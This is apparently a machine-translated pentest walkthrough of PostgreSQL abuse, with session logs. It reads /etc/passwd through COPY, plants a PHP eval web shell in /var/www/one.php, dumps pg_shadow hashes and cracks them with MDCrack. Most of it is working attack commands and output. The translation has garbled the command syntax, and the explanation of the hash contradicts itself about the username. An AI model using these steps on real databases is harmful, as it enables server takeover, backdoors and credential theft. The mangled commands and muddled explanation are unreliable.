Postgresql reads and writes files and crack passwords

1. Read files through copy
Mickey @ pentest :~ /Pentest/crack/mdcrack $ psql-h 127.0.0.1-U postgres
User's postgres password:
Psql (8.4.2)
SSL connection (cipher: DHE-RSA-AES256-SHA, bits: 256)
Type "help" for help.
 
S = # create table file (line text );
CREATE TABLE
 
Postgres = # copy file from "/etc/passwd" with delimiter ":";
ERROR: extra data after last expected column
Background: COPY file, line 1: "root: x: 0: 0: root:/bin/bash"
 
Failed because of the delimiter problem. If the file package to be read contains the specified delimiter, it will fail,
 
S = # create table file (line text );
CREATE TABLE
Postgres = # copy file from "/etc/passwd" with delimiter E "";
COPY 47
S = # select * from file;
 
This is a success. It is unrealistic to use pg_read_file () in actual penetration because it restricts directory access.
 
2. Write a sentence to the web directory
S = # create table file (line text );
CREATE TABLE
S = # insert into file values (E "<? Php eval ($ _ POST [mickey] ;?> ");
INSERT 0 1
S = # copy file (line) to "/var/www/one. php ";
COPY 1
 
3. Crack the database account
 
Postgres = # SELECT usename, passwd FROM pg_shadow;
Usename | passwd
---- + -------------
Postgres | md518d0d1643114d8b58e27c77600a1c658
(1 row)
 
The encryption algorithm is md5 (password + username). In this example, the password is mickey, the username is ipvs, And the merged password is mickeypostgres. After md5 encryption, the encryption algorithm is 18d0d1643114d8b58e27c77600a1c658.
 
Attackers can use MDCRACK to crack the attack.
 
Mickey @ pentest :~ /Pentest/crack/mdcrack $ wine MDCrack-sse.exe-algorithm = MD5-append = s 18d0d1643114d8b58e27c77600a1c658